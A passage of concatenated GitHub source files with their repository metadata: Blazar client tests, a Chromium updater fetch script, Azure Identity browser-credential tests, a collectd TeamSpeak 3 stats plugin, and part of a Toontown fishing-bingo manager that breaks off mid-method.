    """View tests for the chart-preview page (only setup visible here)."""

    def setUp(self):
        self.client = Client()
| {
"content_hash": "edc6f245b50697433d7c5226fdfacf39",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 77,
"avg_line_length": 35.60526315789474,
"alnum_prop": 0.663710273466371,
"repo_name": "frRoy/Benchmarklib",
"id": "3e73743af9758f2995209d52b7aeb3289a8de55c",
"size": "1353",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "benchmarklib/charts/tests/test_views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2905"
},
{
"name": "HTML",
"bytes": "35295"
},
{
"name": "JavaScript",
"bytes": "68956"
},
{
"name": "Python",
"bytes": "56094"
}
],
"symlink_target": ""
} |
import argparse
import mock
from blazarclient import shell
from blazarclient import tests
from blazarclient.v1.shell_commands import networks
class CreateNetworkTest(tests.TestCase):
    """Tests for the create-network shell command."""

    def setUp(self):
        super(CreateNetworkTest, self).setUp()
        self.create_network = networks.CreateNetwork(shell.BlazarShell(), mock.Mock())

    def test_args2body(self):
        """args2body flattens extra capabilities into the request body."""
        parsed_args = argparse.Namespace(
            network_type='vlan',
            physical_network='physnet1',
            segment_id='1234',
            extra_capabilities=[
                'extra_key1=extra_value1',
                'extra_key2=extra_value2',
            ]
        )
        expected_body = {
            'network_type': 'vlan',
            'physical_network': 'physnet1',
            'segment_id': '1234',
            'extra_key1': 'extra_value1',
            'extra_key2': 'extra_value2',
        }
        body = self.create_network.args2body(parsed_args)
        self.assertDictEqual(body, expected_body)
class UpdateNetworkTest(tests.TestCase):
    """Tests for the update-network shell command."""

    def create_update_command(self, list_value):
        # Build an UpdateNetwork command whose mocked client returns
        # `list_value` from network.list(); also return the mocked manager
        # so tests can assert on the calls it received.
        mock_network_manager = mock.Mock()
        mock_network_manager.list.return_value = list_value
        mock_client = mock.Mock()
        mock_client.network = mock_network_manager
        blazar_shell = shell.BlazarShell()
        blazar_shell.client = mock_client
        return networks.UpdateNetwork(blazar_shell, mock.Mock()), mock_network_manager

    def test_update_network(self):
        # Updating by id should forward the parsed extra capabilities as
        # a 'values' dict to manager.update().
        list_value = [
            {'id': '101', 'networkname': 'network-1'},
            {'id': '201', 'networkname': 'network-2'},
        ]
        update_network, network_manager = self.create_update_command(list_value)
        args = argparse.Namespace(
            id='101',
            extra_capabilities=[
                'key1=value1',
                'key2=value2'
            ])
        expected = {
            'values': {
                'key1': 'value1',
                'key2': 'value2'
            }
        }
        update_network.run(args)
        network_manager.update.assert_called_once_with('101', **expected)
class ShowNetworkTest(tests.TestCase):
    """Tests for the show-network shell command."""

    def create_show_command(self, list_value, get_value):
        # Build a ShowNetwork command whose mocked manager returns
        # `list_value` from list() and `get_value` from get().
        mock_network_manager = mock.Mock()
        mock_network_manager.list.return_value = list_value
        mock_network_manager.get.return_value = get_value
        mock_client = mock.Mock()
        mock_client.network = mock_network_manager
        blazar_shell = shell.BlazarShell()
        blazar_shell.client = mock_client
        return networks.ShowNetwork(blazar_shell, mock.Mock()), mock_network_manager

    def test_show_network(self):
        # get_data should return (field-names, values) rows built from
        # the manager.get() payload.
        list_value = [
            {'id': '101'},
            {'id': '201'},
        ]
        get_value = {
            'id': '101'}
        show_network, network_manager = self.create_show_command(list_value,
                                                                 get_value)
        args = argparse.Namespace(id='101')
        expected = [('id',), ('101',)]
        ret = show_network.get_data(args)
        self.assertEqual(ret, expected)
        network_manager.get.assert_called_once_with('101')
class DeleteNetworkTest(tests.TestCase):
    """Tests for the delete-network shell command."""

    def create_delete_command(self, list_value):
        """Build a DeleteNetwork command wired to a mocked network manager."""
        manager = mock.Mock()
        manager.list.return_value = list_value
        client = mock.Mock()
        client.network = manager
        blazar_shell = shell.BlazarShell()
        blazar_shell.client = client
        return networks.DeleteNetwork(blazar_shell, mock.Mock()), manager

    def test_delete_network(self):
        """Deleting by id should call manager.delete() exactly once."""
        fake_networks = [
            {'id': '101', 'networkname': 'network-1'},
            {'id': '201', 'networkname': 'network-2'},
        ]
        delete_command, manager = self.create_delete_command(fake_networks)
        delete_command.run(argparse.Namespace(id='101'))
        manager.delete.assert_called_once_with('101')
| {
"content_hash": "a97d6329bdf66c3bbf92905c61fd1f9a",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 86,
"avg_line_length": 30.93846153846154,
"alnum_prop": 0.5785678766782695,
"repo_name": "ChameleonCloud/python-blazarclient",
"id": "481ba2066c40d747fac8e1be64136189dbd29217",
"size": "4600",
"binary": false,
"copies": "1",
"ref": "refs/heads/chameleoncloud/xena",
"path": "blazarclient/tests/v1/shell_commands/test_networks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "171893"
}
],
"symlink_target": ""
} |
import argparse
import datetime
import json
import os
import sys
import urllib.request
# TODO(crbug.com/1336630): This is compared lexically. Remove it before M1000.
MIN_VERSION = '107.0.5298.0'
def fetch():
    """
    Queries the VersionHistory API to determine the version of the updater that
    was serving on Monday.
    """
    # TODO(crbug.com/1293206): Once this script is python3 only, use
    # datetime.timezone.utc to make it consistent regardless of local timezone.
    # Compute midnight (local time) of the most recent Monday.
    datum = datetime.datetime.now()
    datum = (datum - datetime.timedelta(days=datum.weekday())).replace(
        hour=0, minute=0, second=0, microsecond=0)
    datum = datum.isoformat() + 'Z'
    # %%3C / %%3E are %-escaped "%3C"/"%3E" (URL-encoded '<' and '>'), i.e.
    # filter=starttime<datum,endtime>datum.
    return json.load(
        urllib.request.urlopen(
            'https://versionhistory.googleapis.com/v1/chromium_updater/'
            'platforms/mac/channels/all/versions/all/releases?'
            'filter=starttime%%3C%s,endtime%%3E%s' %
            (datum, datum)))['releases'][0]['version']
def print_latest():
    # Clamp to MIN_VERSION so the reported version never regresses below
    # the supported floor. NOTE: max() compares these version strings
    # lexically — see the MIN_VERSION TODO above.
    print(max(fetch(), MIN_VERSION))
def get_url():
    """Print the 3pp 'get_url' JSON manifest for the updater zip
    corresponding to the _3PP_VERSION environment variable."""
    version = os.environ['_3PP_VERSION']
    archive = 'GoogleUpdater-%s.zip' % version
    manifest = {
        'url': [
            'https://edgedl.me.gvt1.com/edgedl/release2/182l0/latest/'
            + archive
        ],
        'ext': '.zip',
        'name': [archive]
    }
    print(json.dumps(manifest))
def main():
    """Dispatch the 'latest' / 'get_url' 3pp subcommands."""
    parser = argparse.ArgumentParser()
    subcommands = parser.add_subparsers()
    subcommands.add_parser('latest').set_defaults(
        func=lambda _opts: print_latest())
    subcommands.add_parser('get_url').set_defaults(
        func=lambda _opts: get_url())
    opts = parser.parse_args()
    return opts.func(opts)
if __name__ == '__main__':
sys.exit(main())
| {
"content_hash": "a7c16ae4e09c9cd633b917508e61d46f",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 79,
"avg_line_length": 29.964912280701753,
"alnum_prop": 0.6176814988290398,
"repo_name": "nwjs/chromium.src",
"id": "7eb925a3304c4a3acd54d389bfd5de31d7a6d781",
"size": "1894",
"binary": false,
"copies": "1",
"ref": "refs/heads/nw70",
"path": "third_party/updater/chrome_mac_universal_prod/3pp/fetch.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from azure.core.exceptions import ClientAuthenticationError
from azure.core.pipeline.policies import SansIOHTTPPolicy
from azure.core.pipeline.transport import RequestsTransport
from azure.identity import InteractiveBrowserCredential
from azure.identity._internal.user_agent import USER_AGENT
import pytest
from unittest.mock import ANY, Mock, patch
WEBBROWSER_OPEN = InteractiveBrowserCredential.__module__ + ".webbrowser.open"
@pytest.mark.manual
def test_browser_credential():
    """Interactive end-to-end test: authenticates via the browser once, then
    verifies the credential redeems cached tokens silently afterwards."""
    transport = Mock(wraps=RequestsTransport())
    credential = InteractiveBrowserCredential(transport=transport)
    scope = "https://management.azure.com/.default"  # N.B. this is valid only in Public Cloud
    record = credential.authenticate(scopes=(scope,))
    assert record.authority
    assert record.home_account_id
    assert record.tenant_id
    assert record.username

    # credential should have a cached access token for the scope used in authenticate
    with patch(WEBBROWSER_OPEN, Mock(side_effect=Exception("credential should authenticate silently"))):
        token = credential.get_token(scope)
    assert token.token

    # A fresh credential sharing the transport should also succeed.
    credential = InteractiveBrowserCredential(transport=transport)
    token = credential.get_token(scope)
    assert token.token

    # Silent redemption must return the same cached token.
    with patch(WEBBROWSER_OPEN, Mock(side_effect=Exception("credential should authenticate silently"))):
        second_token = credential.get_token(scope)
    assert second_token.token == token.token

    # every request should have the correct User-Agent
    for call in transport.send.call_args_list:
        args, _ = call
        request = args[0]
        assert request.headers["User-Agent"] == USER_AGENT
def test_tenant_id_validation():
    """The credential should raise ValueError when given an invalid tenant_id"""
    # GUIDs, verified domains and the well-known aliases are all accepted
    for tenant in (
        "c878a2ab-8ef4-413b-83a0-199afb84d7fb",
        "contoso.onmicrosoft.com",
        "organizations",
        "common",
    ):
        InteractiveBrowserCredential(tenant_id=tenant)
    # whitespace, path separators and quotes are rejected
    for tenant in ("my tenant", "my_tenant", "/", "\\", '"my-tenant"', "'my-tenant'"):
        with pytest.raises(ValueError):
            InteractiveBrowserCredential(tenant_id=tenant)
def test_no_scopes():
    """The credential should raise when get_token is called with no scopes"""
    empty_scopes = ()
    with pytest.raises(ValueError):
        InteractiveBrowserCredential().get_token(*empty_scopes)
def test_policies_configurable():
    # the policy raises an exception so this test can run without authenticating i.e. opening a browser
    expected_message = "test_policies_configurable"
    exploding_hook = Mock(side_effect=Exception(expected_message))
    policy = Mock(spec_set=SansIOHTTPPolicy, on_request=exploding_hook)
    credential = InteractiveBrowserCredential(policies=[policy])

    with pytest.raises(ClientAuthenticationError) as ex:
        credential.get_token("scope")

    # the custom policy ran and its error surfaced through the credential
    assert expected_message in ex.value.message
    assert policy.on_request.called
| {
"content_hash": "a6eedc16daaa64291a850986ae0ec32b",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 110,
"avg_line_length": 38.55263157894737,
"alnum_prop": 0.7375426621160409,
"repo_name": "Azure/azure-sdk-for-python",
"id": "113ce21dcaeefb7ed27b51fc721c2c66bde8356a",
"size": "3081",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/identity/azure-identity/tests/test_browser_credential.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import telnetlib
import time
# Name under which values are dispatched to collectd.
PLUGIN_NAME = "ts3_stats"
# COMMAND LINE CONFIG
# Because we don't know where the config file is (it is read by collectd)
# these defaults are used when running standalone (no <Plugin> config).
HOST = '127.0.0.1'
PORT = '10011'
USERNAME = 'serveradmin'
PASSWORD = ''
# collectd data-set type names used when dispatching values.
TYPE_GAUGE = 'gauge'
TYPE_BYTES = 'bytes'
# Standalone fallback: outside the collectd daemon the real `collectd`
# module is unavailable, so emulate just enough of its API (register_*
# hooks, logging) to exercise the plugin from the command line.
try:
    import collectd
except:
    import sys
    class CollectD:
        def register_config(self, callback):
            # collectd would pass the parsed config block; standalone has none.
            callback(None)
        def register_init(self, callback):
            callback()
        def register_read(self, callback):
            # Emulate the daemon's periodic read loop: one read per second
            # for ~16 seconds, then return.
            for i in range(0, 15):
                time.sleep(1)
                callback()
            time.sleep(1)
        def register_shutdown(self, callback):
            callback()
        # All log levels simply write to stdout and flush immediately.
        def debug(self, message):
            sys.stdout.write(message)
            sys.stdout.flush()
        def error(self, message):
            sys.stdout.write(message)
            sys.stdout.flush()
        def warning(self, message):
            sys.stdout.write(message)
            sys.stdout.flush()
        def notice(self, message):
            sys.stdout.write(message)
            sys.stdout.flush()
        def info(self, message):
            sys.stdout.write(message)
            sys.stdout.flush()
    # Stand-in for collectd.Values: dispatch just logs the value list.
    # NOTE(review): this class is a sibling of CollectD, so
    # `collectd.Values(...)` (as called in __newCollectdValue) would raise
    # AttributeError in standalone mode — verify whether standalone dispatch
    # is expected to work.
    class Values:
        def __init__(self, plugin):
            self.plugin = plugin
            self.type = ""
            self.type_instance = ""
            self.values = []
        def dispatch(self):
            collectd.debug('\n' + self.type + ' ' + self.type_instance + ' [' + ', '.join(map(str, self.values)) + ']')
    # Shadow the missing module with an instance exposing the same hooks.
    collectd = CollectD()
class TS3DefaultException(Exception):
    """Generic failure while talking to the TS3 ServerQuery interface."""
    pass
class TS3ServerQuery:
    """Minimal TeamSpeak 3 ServerQuery client speaking the telnet protocol.

    Implements only the commands the stats plugin needs: login,
    serverlist, use, ftlist and quit.
    """
    __tn = None
    __NEWLINE = '\n\r'
    # Status lines start with the key 'error' (e.g. "error id=0 msg=ok").
    __STATUSLINE = 'error'

    def __init__(self, host, port, timeout = 3):
        """Open the telnet connection and consume the server banner."""
        self.__tn = telnetlib.Telnet(host, port, timeout)
        id_string = self.__read_line()
        if id_string == 'TS3':
            # Skip the greeting line that follows the protocol identifier.
            self.__read_line()

    def __send_command(self, command):
        self.__tn.write(command + self.__NEWLINE)

    def __read_line(self):
        # Read one protocol line, stripping the trailing newline sequence.
        return self.__tn.read_until(self.__NEWLINE)[:-len(self.__NEWLINE)]

    def __read_dictionary(self):
        return self.__string_to_dictionary(self.__read_line())

    def __read_until_statusline(self, allowedErrorIDArray = []):
        """Collect response dictionaries until the status line arrives.

        Raises TS3DefaultException unless the status id is 0 or listed in
        allowedErrorIDArray. (The mutable default is only read, never
        mutated.)
        """
        results = []
        while True:
            line = self.__read_dictionary()
            if not self.__response_is_status(line):
                results.append(line)
            else:
                if int(line['id']) in ([0] + allowedErrorIDArray):
                    return results
                raise TS3DefaultException('Command failed', line)

    def __response_is_status(self, dictionary):
        # A response line is a status line iff it carries the 'error' key.
        return self.__STATUSLINE in dictionary.keys()

    def __expect_statusline_success(self):
        """Read one line and require it to be a successful (id=0) status."""
        line = self.__read_dictionary()
        if self.__response_is_status(line) and int(line['id']) == 0:
            return True
        raise TS3DefaultException('Command failed', line)

    def __expect_dictionaryline(self):
        """Read one line and require it NOT to be a status line."""
        line = self.__read_dictionary()
        if self.__response_is_status(line):
            raise TS3DefaultException('Command failed', line)
        return line

    def __string_to_dictionary(self, string):
        """Parse a space-separated run of key=value tokens into a dict.

        A bare key maps to ''. Only the first '=' splits key from value,
        so values may themselves contain '=' characters (the previous
        split('=', 2) produced three parts for such tokens and silently
        dropped the parameter).
        """
        dictionary = {}
        for param in string.split(' '):
            key, _sep, value = param.partition('=')
            dictionary[key] = value
        return dictionary

    def login(self, username, password):
        self.__send_command('login {0} {1}'.format(username, password))
        self.__expect_statusline_success()

    def serverlist(self):
        """Return one dict per virtual server."""
        self.__send_command('serverlist')
        return self.__read_until_statusline()

    def use(self, virtualServerId):
        """Select the virtual server subsequent commands apply to."""
        self.__send_command('use {0}'.format(virtualServerId))
        self.__expect_statusline_success()

    def ftlist(self):
        """Return the active file transfers; error id 1281 is tolerated
        (presumably "empty result" — TODO confirm against the ServerQuery
        manual) and yields an empty list."""
        self.__send_command('ftlist')
        return self.__read_until_statusline([1281])

    def quit(self):
        self.__send_command('quit')
        self.__expect_statusline_success()
class TS3ServerStats:
    """Gathers per-virtual-server statistics through a TS3ServerQuery session."""
    __TS3SQ = None

    def __init__(self, host, port, username, password):
        self.__TS3SQ = TS3ServerQuery(host, int(port))
        if not self.__TS3SQ:
            self.__TS3SQ = None
            raise TS3DefaultException()
        self.__TS3SQ.login(username, password)

    def __del__(self):
        # Politely close the ServerQuery session when garbage-collected.
        if self.__TS3SQ:
            self.__TS3SQ.quit()

    def __get_clientsonline(self):
        servers = self.__TS3SQ.serverlist()
        return int(servers[0]['virtualserver_clientsonline'])

    def __get_filetransfer_vs_total(self, virtualServerID):
        """Count and total the speed of transfers on one virtual server."""
        self.__TS3SQ.use(virtualServerID)
        transfers = self.__TS3SQ.ftlist()
        speeds = [float(transfer['current_speed']) for transfer in transfers]
        return {
            'count': len(transfers),
            'current_speed': sum(speeds, 0.0),
        }

    def getMyStats(self):
        """Return {virtual_server_id: {clients_online, filetransfer_count,
        filetransfer_speed}} for every virtual server."""
        results = {}
        for server in self.__TS3SQ.serverlist():
            sid = server['virtualserver_id']
            transfers = self.__get_filetransfer_vs_total(sid)
            results[sid] = {
                'clients_online': int(server['virtualserver_clientsonline']),
                'filetransfer_count': transfers['count'],
                'filetransfer_speed': transfers['current_speed'],
            }
        return results
def __newCollectdValue(plugin_name, type, type_instance, values):
    """Build and immediately dispatch one collectd value list."""
    global collectd
    metric = collectd.Values(plugin = plugin_name)
    metric.type = type
    metric.type_instance = type_instance
    metric.values = values
    metric.dispatch()
# Module-level singletons: parsed plugin config, and the active
# TS3ServerStats connection (None while disconnected).
ts3config = None
ts3 = None
def __connectTS3():
    """Lazily create the global TS3ServerStats connection.

    No-op when already connected. On failure, leaves ``ts3`` as None and
    re-raises the original exception (with its traceback intact).
    """
    global ts3
    global ts3config
    if ts3 is None:
        try:
            ts3 = TS3ServerStats(ts3config['Host'], int(ts3config['Port']),
                                 ts3config['Username'], ts3config['Password'])
        except Exception:
            ts3 = None
            # Bare raise preserves the original traceback (unlike `raise e`).
            raise
def __getStatsTS3():
    """Return current stats from the global connection.

    Raises TS3DefaultException when there is no connection or the query
    fails, dropping the connection so the next read reconnects. Catches
    only Exception (the original bare ``except:`` also swallowed
    SystemExit/KeyboardInterrupt).
    """
    global ts3
    try:
        if ts3 is not None:
            return ts3.getMyStats()
        raise TS3DefaultException()
    except Exception:
        ts3 = None
        raise TS3DefaultException()
def __disconnectTS3():
    # Drop the connection object; TS3ServerStats.__del__ sends 'quit' when
    # it is garbage-collected.
    global ts3
    ts3 = None
def ts3_config(config):
    """collectd config callback: read plugin options, or fall back to the
    module-level defaults when running standalone (config is None)."""
    global ts3config
    collectd.debug('ts3_config:\n')
    ts3config = {}
    if config is not None:
        for node in config.children:
            ts3config[node.key] = node.values[0]
    else:
        ts3config = {
            'Host': HOST,
            'Port': PORT,
            'Username': USERNAME,
            'Password': PASSWORD,
        }
    for key in ts3config:
        collectd.debug('\t' + key + ': ' + ts3config[key] + '\n')
def ts3_init():
    """collectd init callback: attempt the initial ServerQuery connection."""
    collectd.debug('ts3_init:')
    try:
        __connectTS3()
    except Exception as e:
        collectd.debug('FAILED\n')
        collectd.warning(str(e) + '\n')
    else:
        collectd.debug('ok\n')
def ts3_read():
    """collectd read callback: reconnect if needed, fetch the stats and
    dispatch one gauge/bytes value per virtual server metric."""
    collectd.debug('ts3_read:')
    # Reconnect if connection was lost or TS3 is not up yet
    try:
        __connectTS3()
    except Exception as e:
        collectd.debug('FAILED\n')
        collectd.warning(str(e) + '\n')
    try:
        stats = __getStatsTS3()
        collectd.debug('ok')
        for sid, server in stats.items():
            prefix = 'ts3vs' + str(sid) + '_'
            __newCollectdValue(PLUGIN_NAME, TYPE_GAUGE, prefix + 'clients_online',
                               [server['clients_online']])
            __newCollectdValue(PLUGIN_NAME, TYPE_GAUGE, prefix + 'filetransfer_count',
                               [server['filetransfer_count']])
            __newCollectdValue(PLUGIN_NAME, TYPE_BYTES, prefix + 'filetransfer_speed',
                               [server['filetransfer_speed']])
    except Exception as e:
        collectd.warning(str(e))
        collectd.debug('SKIP')
    collectd.debug('\n')
def ts3_shutdown():
    """collectd shutdown callback: drop the ServerQuery connection."""
    collectd.debug('ts3_shutdown:\n')
    try:
        __disconnectTS3()
    except Exception as e:
        collectd.debug('FAILED\n')
        collectd.warning(str(e) + '\n')
    else:
        collectd.debug('ok\n')
# Register the plugin lifecycle callbacks with the collectd daemon (or with
# the standalone shim defined above when run outside collectd).
collectd.register_config(ts3_config)
collectd.register_init(ts3_init)
collectd.register_read(ts3_read)
collectd.register_shutdown(ts3_shutdown)
| {
"content_hash": "d147203d82aab1d6ec88730ff48750b6",
"timestamp": "",
"source": "github",
"line_count": 330,
"max_line_length": 122,
"avg_line_length": 22.03030303030303,
"alnum_prop": 0.6711141678129299,
"repo_name": "Silberling/collectd_teamspeak3",
"id": "9934e6f4173bc45aee0493f44d1768e0318976a7",
"size": "7270",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "collectd_ts3.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7270"
}
],
"symlink_target": ""
} |
from direct.distributed import DistributedObject
from direct.distributed.ClockDelta import *
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import FSM
from direct.gui.DirectGui import *
from panda3d.core import *
from panda3d.direct import *
from direct.task import Task
from toontown.fishing import BingoGlobals
from toontown.fishing import BingoCardGui
from toontown.fishing import FishGlobals
from toontown.fishing import NormalBingo
from toontown.fishing import FourCornerBingo
from toontown.fishing import DiagonalBingo
from toontown.fishing import ThreewayBingo
from toontown.fishing import BlockoutBingo
from direct.showbase import RandomNumGen
from toontown.toonbase import ToontownTimer
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import time
class DistributedPondBingoManager(DistributedObject.DistributedObject, FSM.FSM):
    """Client-side manager for the Fish Bingo minigame at a fishing pond.

    Owns the BingoCardGui, forwards catches and bingo calls to the AI via
    distributed updates, and mirrors the server-driven game state machine
    (Off / Intro / WaitCountdown / Playing / Reward / GameOver /
    Intermission / CloseEvent).
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPondBingoManager')
    # Maps a bingo card type id to the game class implementing its rules.
    cardTypeDict = {
        BingoGlobals.NORMAL_CARD: NormalBingo.NormalBingo,
        BingoGlobals.FOURCORNER_CARD: FourCornerBingo.FourCornerBingo,
        BingoGlobals.DIAGONAL_CARD: DiagonalBingo.DiagonalBingo,
        BingoGlobals.THREEWAY_CARD: ThreewayBingo.ThreewayBingo,
        BingoGlobals.BLOCKOUT_CARD: BlockoutBingo.BlockoutBingo,
    }

    def __init__(self, cr):
        DistributedObject.DistributedObject.__init__(self, cr)
        FSM.FSM.__init__(self, 'DistributedPondBingoManager')
        self.cardId = 0
        self.jackpot = 0
        self.pond = None
        self.spot = None
        self.card = None
        self.hasEntered = 0          # 1 once the local toon has seen the card GUI
        self.initGameState = None    # game state received before the card exists
        self.lastCatch = None        # (genus, species) of the most recent catch
        self.typeId = BingoGlobals.NORMAL_CARD
        return

    def generate(self):
        """Create the (initially hidden) card GUI when the object appears."""
        DistributedObject.DistributedObject.generate(self)
        self.card = BingoCardGui.BingoCardGui()
        self.card.reparentTo(aspect2d, 1)
        self.card.hideNextGameTimer()
        self.notify.debug('generate: DistributedPondBingoManager')

    def delete(self):
        """Detach from the pond and tear down the FSM and card GUI."""
        del self.pond.pondBingoMgr
        self.pond.pondBingoMgr = None
        del self.pond
        self.pond = None
        FSM.FSM.cleanup(self)
        self.card.destroy()
        del self.card
        self.notify.debug('delete: Deleting Local PondManager %s' % self.doId)
        DistributedObject.DistributedObject.delete(self)
        return

    def d_cardUpdate(self, cellId, genus, species):
        # Tell the AI which fish was applied to which cell of our card.
        self.sendUpdate('cardUpdate', [self.cardId, cellId, genus, species])

    def d_bingoCall(self):
        # Claim a bingo for our current card; the AI validates the call.
        self.sendUpdate('handleBingoCall', [self.cardId])

    def setCardState(self, cardId, typeId, tileSeed, gameState):
        """Receive the card identity/seed/state; applied in __generateCard."""
        self.cardId = cardId
        self.typeId = typeId
        self.tileSeed = tileSeed
        self.jackpot = BingoGlobals.getJackpot(typeId)
        self.initGameState = gameState

    def checkForUpdate(self, cellId):
        """Apply the last catch to the clicked cell and report it to the AI."""
        if self.lastCatch is not None:
            genus = self.lastCatch[0]
            species = self.lastCatch[1]
            self.d_cardUpdate(cellId, genus, species)
            success = self.card.cellUpdateCheck(cellId, genus, species)
            if success == BingoGlobals.WIN:
                self.lastCatch = None
                self.enableBingo()
                self.pond.getLocalToonSpot().cleanupFishPanel()
                self.pond.getLocalToonSpot().hideBootPanel()
            elif success == BingoGlobals.UPDATE:
                self.lastCatch = None
                self.pond.getLocalToonSpot().cleanupFishPanel()
                self.pond.getLocalToonSpot().hideBootPanel()
        else:
            self.notify.warning('CheckForWin: Attempt to Play Cell without a valid catch.')
        return

    def updateGameState(self, gameState, cellId):
        """AI-driven sync of the shared game state plus one cell refresh."""
        game = self.card.getGame()
        if game is not None:
            game.setGameState(gameState)
            self.card.cellUpdate(cellId)
        return

    def __generateCard(self):
        """(Re)build the card GUI for the current type/seed/state."""
        self.notify.debug('__generateCard: %s' % self.typeId)
        if self.card.getGame():
            self.card.removeGame()
        game = self.__cardChoice()
        game.setGameState(self.initGameState)
        self.card.addGame(game)
        self.card.generateCard(self.tileSeed, self.pond.getArea())
        color = BingoGlobals.getColor(self.typeId)
        self.card.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
        color = BingoGlobals.getButtonColor(self.typeId)
        self.card.bingo.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
        if self.hasEntered:
            self.card.loadCard()
            self.card.show()
        else:
            self.card.hide()

    def showCard(self):
        """Show the card GUI appropriate to the current FSM state (called
        when the local toon enters a fishing spot)."""
        # BUGFIX: the original condition was
        #   (self.state != 'Off' or self.state != 'CloseEvent')
        # which is always true; the intent is "in an active state".
        if self.state not in ('Off', 'CloseEvent') and self.card.getGame():
            self.card.loadCard()
            self.card.show()
        elif self.state == 'GameOver':
            self.card.show()
        elif self.state == 'Reward':
            self.card.show()
        elif self.state == 'WaitCountdown':
            self.card.show()
            self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)
        elif self.state == 'Intermission':
            self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
            self.card.show()
        self.hasEntered = 1

    def __cardChoice(self):
        # Instantiate the game class registered for the current card type.
        return self.cardTypeDict.get(self.typeId)()

    def checkForBingo(self):
        """Bingo-button callback: verify locally, then claim to the AI."""
        success = self.card.checkForBingo()
        if success:
            self.d_bingoCall()
            self.request('Reward')

    def enableBingo(self):
        self.card.setBingo(DGG.NORMAL, self.checkForBingo)

    def setPondDoId(self, pondId):
        """Bind to the pond, waiting for its generation if necessary."""
        self.pondDoId = pondId
        if pondId in self.cr.doId2do:
            self.setPond(self.cr.doId2do[pondId])
        else:
            self.acceptOnce('generate-%d' % pondId, self.setPond)

    def setPond(self, pond):
        self.pond = pond
        self.pond.setPondBingoManager(self)

    def setState(self, state, timeStamp):
        # AI broadcast driving the FSM; timeStamp synchronizes countdowns.
        self.notify.debug('State change: %s -> %s' % (self.state, state))
        self.request(state, timeStamp)

    def setLastCatch(self, catch):
        self.lastCatch = catch
        self.card.fishCaught(catch)

    def castingStarted(self):
        if self.card:
            self.card.castingStarted()

    def setSpot(self, spot):
        self.spot = spot

    def setJackpot(self, jackpot):
        self.jackpot = jackpot

    # TODO: fix crash (inherited note from the original source)
    def enterOff(self, args = None):
        self.notify.debug('enterOff: Enter Off State')
        del self.spot
        self.spot = None
        # BUGFIX: original tested the bound method `self.card.getGame`
        # (always truthy) instead of calling it, matching __generateCard.
        if self.card.getGame():
            self.card.removeGame()
        self.card.hide()
        self.card.stopNextGameTimer()
        self.hasEntered = 0
        self.lastCatch = None
        return

    def filterOff(self, request, args):
        # Returning None (falling through) denies the transition.
        if request == 'Intro':
            return 'Intro'
        elif request == 'WaitCountdown':
            return (request, args)
        elif request == 'Playing':
            # Late join mid-game: build the card before entering Playing.
            self.__generateCard()
            self.card.setJackpotText(str(self.jackpot))
            return (request, args)
        elif request == 'Intermission':
            return (request, args)
        elif request == 'GameOver':
            return (request, args)
        elif request == 'Reward':
            return ('GameOver', args)
        else:
            self.notify.debug('filterOff: Invalid State Transition from, Off to %s' % request)

    def exitOff(self):
        self.notify.debug('exitOff: Exit Off State')

    def enterIntro(self, args = None):
        self.notify.debug('enterIntro: Enter Intro State')
        self.pond.setSpotGui()
        self.hasEntered = 1

    def filterIntro(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        else:
            self.notify.debug('filterIntro: Invalid State Transition from Intro to %s' % request)

    def exitIntro(self):
        self.notify.debug('exitIntro: Exit Intro State')

    def enterWaitCountdown(self, timeStamp):
        self.notify.debug('enterWaitCountdown: Enter WaitCountdown State')
        # Local name avoids shadowing the imported `time` module.
        remaining = BingoGlobals.TIMEOUT_SESSION - globalClockDelta.localElapsedTime(timeStamp[0])
        self.card.startNextGameCountdown(remaining)
        if self.hasEntered:
            self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)

    def filterWaitCountdown(self, request, args):
        if request == 'Playing':
            return (request, args)
        else:
            self.notify.debug('filterOff: Invalid State Transition from WaitCountdown to %s' % request)

    def exitWaitCountdown(self):
        self.notify.debug('exitWaitCountdown: Exit WaitCountdown State')
        if self.pond:
            self.__generateCard()
            self.card.setJackpotText(str(self.jackpot))
        self.card.resetGameTimer()
        self.card.hideNextGameTimer()

    def enterPlaying(self, timeStamp):
        self.notify.debug('enterPlaying: Enter Playing State')
        self.lastCatch = None
        session = BingoGlobals.getGameTime(self.typeId)
        remaining = session - globalClockDelta.localElapsedTime(timeStamp[0])
        self.card.startGameCountdown(remaining)
        self.card.enableCard(self.checkForUpdate)
        return

    def filterPlaying(self, request, args):
        if request == 'Reward':
            return (request, args)
        elif request == 'GameOver':
            return (request, args)
        else:
            self.notify.debug('filterOff: Invalid State Transition from Playing to %s' % request)

    def exitPlaying(self):
        self.notify.debug('exitPlaying: Exit Playing State')
        self.card.resetGameTimer()

    def enterReward(self, timeStamp):
        """The local toon won: pay out the jackpot to their jar display."""
